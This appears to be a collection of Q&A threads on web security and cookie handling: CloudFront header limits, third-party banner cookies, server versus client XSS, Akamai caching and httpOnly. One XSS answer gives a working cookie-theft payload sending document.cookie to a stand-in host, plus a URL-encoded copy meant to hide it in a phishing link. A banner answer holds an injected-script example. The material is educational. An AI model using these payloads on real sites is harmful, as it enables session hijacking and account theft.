Is there a way to exploit victims through self-contained XSS, i.e. XSS vulnerabilities which are protected by CSRF protections based on login credentials?
Thanks
Assuming that self-contained XSS is a data: URI containing HTML with JS, then no.
data: URIs are considered to have a unique origin, which is different from all other origins.
We are using AWS CloudFront to distribute our Angular web apps. This is set up and configured so that our web apps are live and can be accessed. However, because we need to allow authentication across these apps, we have implemented cookies whose domain is set to the core domain with a wildcard for subdomains. For example, we may have two web apps, one at appone.example.com and the other at apptwo.example.com, both of which look at the same selection of cookies, shared across subdomains by setting the cookie domain to .example.com.
Now, this setup works great: we do not send our cookies with API requests and instead just send an authentication header, so there are no issues with header size there, and we have no need for these cookies to make their way into the request to CloudFront. However, these requests are initiated by the browser, so the request cannot be manipulated to remove the Cookie header, which is where the issues arise.
When we have quite a few cookies (around 30), that is, two lots of Cognito cookies and a few others containing the information needed to bootstrap the Cognito setup, the request size comes to around 22,000 bytes. This exceeds the AWS limit of 20,480 bytes stated here. If my request is below 20,480 bytes, it completes successfully.
Now, considering I do not need these cookies to reach CloudFront, I assumed it would be possible to strip them from the header as part of the origin request policies or using a viewer-request Lambda@Edge function. However, the request does not seem to get far enough to hit this functionality.
Here is some example code provided by an AWS template. This Lambda@Edge function does not strip the headers as suggested above, but it should still log the event if it is hit; if the request is less than 20,480 bytes, it does. If not, it does not log:
exports.handler = async (event, context) => {
    console.log(event);

    /*
     * Generate HTTP response using 200 status code with a simple body.
     */
    const response = {
        status: '200',
        statusDescription: 'OK',
        headers: {
            vary: [{
                key: 'Vary',
                value: '*',
            }],
            'last-modified': [{
                key: 'Last-Modified',
                value: '2017-01-13',
            }],
        },
        body: 'Example body generated by Lambda@Edge function.',
    };
    return response;
};
Now, I think I could mitigate the issue by removing one set of the Cognito cookies and the configuration cookies involved in instantiating it. However, this is a less than ideal situation, because it means that each time you switch between the two systems you will need to log in again, which is not great and does not fit our use case, which is quite specialised.
The other solution is to drop cookies and switch to local storage shared across domains. This, however, brings a security challenge with XSS, and from initial research it seems unviable and unacceptable.
So overall, based on my current limited understanding of AWS CloudFront, my question becomes: can the Cookie header be stripped from the request, so that the request is accepted without the 494 error page? In our use case we only wish to use cookies as a means of cross-domain storage, so we do not need these cookies to travel with the requests for static JS files.
If you just want to avoid sending cookies with requests to static assets, set up a different domain and serve them from there.
But I'm really wondering what you're thinking here: if your Angular app can access the token stored as a cookie, then it isn't any safer than localStorage from an XSS standpoint.
I want to post a banner ad on a.com. For this to happen, a.com has to query b.com for the banner URL via JSONP. When requested, b.com returns something like this:
{
    "img_url": "www.c.com/banner.jpg"
}
My question is: is it possible for c.com to set a cookie on the client browser so that it knows if the client has seen this banner image already?
To clarify:
c.com isn't trying to track any information on a.com. It just wants to set a third-party cookie on the client browser for tracking purposes.
I have no control over a.com, so I cannot write any client-side JS or ask them to include any external JS files. I can only expose a query URL on b.com for a.com's programmer to query.
I have total control of b.com and c.com.
When a.com receives the banner URL via JSONP, it will insert the banner dynamically into its DOM for display purposes.
A small follow-up question:
Since I don't know how a.com's programmer will insert the banner into the DOM, is it possible for them to request the image from c.com but still prevent c.com from setting any third-party cookies?
is it possible for c.com to set a cookie on the client browser so that it knows if the client has seen this banner image already?
Not based on the requests so far. c.com isn't involved beyond being mentioned by b.com.
If the data in the response from b.com were used to make a request to www.c.com, then www.c.com could include cookie-setting headers in its response.
Subsequent requests to www.c.com from the same browser would echo those cookies back.
These would be third party cookies, so are more likely to be blocked by privacy settings.
Simple Version
In the HTTP response from c.com, you can send a Set-Cookie header.
If the browser does end up loading www.c.com/banner1234.jpg and later www.c.com/banner7975.jpg, you can send e.g. Set-Cookie: seen_banners=1234,7975 to keep track of which banners have been seen.
When the HTTP request arrives at www.c.com, it will contain a header like Cookie: seen_banners=1234,7975 and you can parse out which banners have been seen.
If you use separate cookies like this:
Set-Cookie: seen_1234=true
Set-Cookie: seen_7975=true
Then you'll get back request headers like:
Cookie: seen_1234=true; seen_7975=true
How much parsing you do of the values is up to you. Also note that there are many cookie attributes you may consider setting.
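As a concrete sketch of the single-cookie variant described above (the function names are illustrative, not from any particular framework):

```javascript
// Parse the banner IDs out of a "Cookie: seen_banners=1234,7975" header.
function parseSeenBanners(cookieHeader) {
    const match = /(?:^|;\s*)seen_banners=([^;]*)/.exec(cookieHeader || '');
    return match ? match[1].split(',').filter(Boolean) : [];
}

// Build the Set-Cookie response header value after serving bannerId.
function addSeenBanner(cookieHeader, bannerId) {
    const seen = parseSeenBanners(cookieHeader);
    if (!seen.includes(bannerId)) {
        seen.push(bannerId);
    }
    return 'seen_banners=' + seen.join(',') + '; Path=/; Max-Age=31536000';
}
```

On each image request, www.c.com would read the incoming Cookie header with the first function and reply with the Set-Cookie value from the second.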
Caveats
Some modern browsers and ad-blocking extensions will block these cookies as an anti-tracking measure. They can't know your intentions.

These cookies will be visible to www.c.com only.

Cookies have size restrictions imposed by browsers and even some firewalls. These can be restrictions on per-cookie length, on the total length of cookies per domain, or just on the number of cookies. I've encountered a firewall that allowed a certain number of bytes in Cookie: request headers and dropped all Cookie: headers beyond that size. Some older mobile devices have very small limits on cookie size.

Cookies are editable by the user and can be tampered with by men-in-the-middle.
Consider adding an authenticator over your cookie value, such as an HMAC, so that you can be sure the values you read are values you wrote. This won't defend against replay attacks unless you include a replay defense such as a timestamp before signing the cookie.
This is really important: Cookies you receive at your server in HTTP requests must be considered adversary-controlled data. Unless you've put in protections like that HMAC (and you keep your HMAC secret really secret!) don't put those values in trusted storage without labeling them tainted. If you make a dashboard for tracking banner impressions and you take the text of the cookie values from requests and display them in a browser, you might be in trouble if someone sends:
Cookie: seen_banners=<script src="http://evil.domain.com/attack_banner_author.js"></script>
Aside: I've answered your question, but I feel obligated to warn you that JSONP is really, really dangerous to the users of www.a.com. Please consider alternatives, such as just serving back HTML with an img tag.
What is a clear explanation of the difference between Server XSS and Client XSS?
I read the explanation on the OWASP site, but it wasn't very clear to me. I know the reflected, stored, and DOM-based types.
First, to set the scene for anyone else finding the question, here is the text from the OWASP Types of Cross-Site Scripting page:

Server XSS

Server XSS occurs when untrusted user supplied data is included in an HTML response generated by the server. The source of this data could be from the request, or from a stored location. As such, you can have both Reflected Server XSS and Stored Server XSS. In this case, the entire vulnerability is in server-side code, and the browser is simply rendering the response and executing any valid script embedded in it.

Client XSS

Client XSS occurs when untrusted user supplied data is used to update the DOM with an unsafe JavaScript call. A JavaScript call is considered unsafe if it can be used to introduce valid JavaScript into the DOM. The source of this data could be from the DOM, or it could have been sent by the server (via an AJAX call, or a page load). The ultimate source of the data could have been from a request, or from a stored location on the client or the server. As such, you can have both Reflected Client XSS and Stored Client XSS.
This redefines XSS into two categories: Server and Client.
Server XSS means that the data comes directly from the server onto the page. For example, the data containing the unsanitized text is from the HTTP response that made up the vulnerable page.
Client XSS means that the data comes from JavaScript which has manipulated the page. So it is JavaScript that has added the unsanitized text to the page, rather than it being in the page at that location when it was first loaded in the browser.
Example of Server XSS
An ASP (or ASP.NET) page outputs a variable to the HTML page when it is generated; the value is taken directly from the database:
<%=firstName %>
As firstName is not HTML encoded, a malicious user may have entered their first name as <script>alert('foo')</script>, causing a successful XSS attack.
Another example is the output of variables processed through the server without prior storage:
<%=Request.Form["FirstName"] %>
Example of Client XSS*
<script type="text/javascript">
function loadXMLDoc() {
    var xmlhttp;
    if (window.XMLHttpRequest) {
        // code for IE7+, Firefox, Chrome, Opera, Safari
        xmlhttp = new XMLHttpRequest();
    } else {
        // code for IE6, IE5
        xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
    }
    xmlhttp.onreadystatechange = function() {
        if (xmlhttp.readyState == 4) {
            if (xmlhttp.status == 200) {
                document.getElementById("myDiv").innerHTML = xmlhttp.responseText;
            } else if (xmlhttp.status == 400) {
                alert('There was an error 400');
            } else {
                alert('something else other than 200 was returned');
            }
        }
    };
    xmlhttp.open("GET", "get_first_name.aspx", true);
    xmlhttp.send();
}
</script>
Note that our get_first_name.aspx method does no encoding of the returned data, as it is a web service method that is also used by other systems (the content type is set to text/plain). Our JavaScript code sets innerHTML to this value, so it is vulnerable to Client XSS. To avoid Client XSS in this instance, innerText should be used instead of innerHTML, which will not result in interpretation of HTML characters. It is even better to use textContent, as Firefox is not compatible with the non-standard innerText property.
* code adapted from this answer.
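A sketch of the safe alternatives just mentioned. Assigning to textContent treats the response as plain text; where untrusted input genuinely must be concatenated into HTML, escape it first (the minimal escaper below is illustrative, not a complete sanitizer):

```javascript
// Minimal HTML escaper for untrusted text that must end up inside markup.
function escapeHtml(s) {
    return s.replace(/[&<>"']/g, function (c) {
        return { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c];
    });
}

// Safe: any markup in the response is displayed, not executed.
// document.getElementById("myDiv").textContent = xmlhttp.responseText;

// Also safe, if the value must be built into an HTML string:
// document.getElementById("myDiv").innerHTML = escapeHtml(xmlhttp.responseText);
```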
SilverlightFox has explained everything well, but I would like to add some examples.
Server XSS:
So let's say that we found a vulnerable website which doesn't properly handle the comment box text. We create a new comment and type in:
<p>This picture gives me chills</p>
<script>img=new Image();img.src="http://www.evilsite.com/cookie_steal.php?cookie="+document.cookie+"&url="+document.domain;</script>
We also create a PHP script that saves both GET values into a text file, and we can then proceed to steal users' cookies. The cookies get sent each time someone loads the injected comment, and the victim doesn't even see it coming (they only see the "This picture gives me chills" comment).
Client XSS:
Let's say we found a website that has a vulnerable search bar which parses the HTML we search for into the page. To test that, simply search for something like:
<font color="red">Test</font>
If the search results show the word "Test" in red, the search engine is vulnerable to client XSS. The attacker then uses the website's personal messages/emails to send its users an innocent-looking URL. This could look like:
Hello, I recently had a problem with this website's search engine.
Please click on following link:
http://www.vulnerable-site.com/search.php?q=%3C%73%63%72%69%70%74%3E%69%6D%67%3D%6E%65%77%20%49%6D%61%67%65%28%29%3B%69%6D%67%2E%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%65%76%69%6C%73%69%74%65%2E%63%6F%6D%2F%63%6F%6F%6B%69%65%5F%73%74%65%61%6C%2E%70%68%70%3F%63%6F%6F%6B%69%65%3D%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2B%22%26%75%72%6C%3D%22%2B%64%6F%63%75%6D%65%6E%74%2E%64%6F%6D%61%69%6E%3B%3C%2F%73%63%72%69%70%74%3E
When anyone clicks the link, the code is launched from their browser (it's encoded into URL characters because otherwise users might suspect the script in the website URL), doing the same thing as the script above: stealing the user's cookies.
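You can see what such a payload contains by URL-decoding it; for instance, decoding just the first eight percent-escapes reveals the opening script tag (decodeURIComponent is the standard JavaScript way to do this):

```javascript
// The first eight percent-escapes of the payload decode to "<script>".
var prefix = '%3C%73%63%72%69%70%74%3E';
var decoded = decodeURIComponent(prefix); // "<script>"
```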
However, if you use this without the website owner's approval, you're breaking the law.
Keep that in mind, and use my examples to fix XSS holes on your own website.
Has anyone had a problem running domain-level cookies with an Akamai implementation?
The site issues a domain-level cookie which contains two values which are used by other apps.
With Akamai in the mix, the cookie never gets generated. When I take Akamai out of the mix, everything works fine. Not sure if anyone else has seen this behavior. I am not clear on how Akamai handles cookies.
Akamai, by default, strips cookies from cached resources.
The logic (quite sensibly) is that cookies are designed to be specific to each browser/user, so caching them makes no sense.
My advice:
1. Check whether the resource in question is being cached. You can use the Akamai browser plugins for this.
2. Think carefully about why you would want cookies in a cached resource.
3. If you are sure you do want these cookies, contact Akamai; they can change this behaviour for you.
As an alternative, you can still cache those pages: you'd need to set the cookies in an uncached URL, which is called from inside the cached pages, for example as a tag.
That way you can do redirects, AJAX calls, or DOM manipulation from JS depending on cookies, from within cached pages.
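A rough sketch of that pattern (the path, cookie name, and handler name are all illustrative): the cached page references an uncached endpoint whose only job is to set the cookies, and whose response is explicitly marked uncacheable.

```javascript
// Hypothetical handler for the uncached URL referenced from cached pages,
// e.g. via <script src="/uncached/set-cookies.js"></script>.
function setCookieHeaders(res) {
    // The domain-level cookie the cached pages rely on.
    res.setHeader('Set-Cookie', 'site_prefs=ab; Path=/; Domain=.example.com');
    // Prevent Akamai (and browsers) from caching this response.
    res.setHeader('Cache-Control', 'private, no-store');
    res.setHeader('Content-Type', 'application/javascript');
}
```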
Searching for possible ways to get a cookie with httpOnly enabled, I cannot find any. But then again, how can browser addons like Firebug, Add 'N Edit Cookie, etc. get the cookies? Can't an attacker do the same?
So my question is: is it really, really impossible to get the cookie of httpOnly-enabled requests using JavaScript?
P.S.: Yes, I'm aware httpOnly doesn't stop XSS attacks. I'm also aware it's futile against sniffers. Let's just focus on JavaScript, sort of the alert(document.cookie) type / pre-httpOnly era.
how can browser addons like Firebug, Add 'N Edit Cookie, etc. get the cookies?
They are browser extensions, and the browser has access to the cookies; extensions have a higher level of privilege than your JS code.
is it really, really impossible to get the cookie of httpOnly-enabled requests using JavaScript?
Provided you are using a browser (i.e. a fairly recent browser) that supports httpOnly and doesn't have a security bug around it, it should be impossible; that's the goal of httpOnly.
Quoting Wikipedia:

When the browser receives such a cookie, it is supposed to use it as usual in the following HTTP exchanges, but not to make it visible to client-side scripts.
Firebug and other addons can do that because they are not running under the security restrictions imposed on the JavaScript of web pages.
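To illustrate, a server can set one cookie with the HttpOnly attribute and one without (the sketch below uses illustrative cookie names). Page scripts reading document.cookie will then see only the second cookie, while the browser still sends both back in HTTP requests.

```javascript
// Set-Cookie header values a server might emit:
var cookieHeaders = [
    'session=abc123; HttpOnly; Secure; Path=/', // hidden from document.cookie
    'theme=dark; Path=/'                        // visible to document.cookie
];

// In the browser, a page script would then observe:
// console.log(document.cookie); // "theme=dark" -- no "session" entry,
// even though "session" is sent with every HTTP request to the site.
```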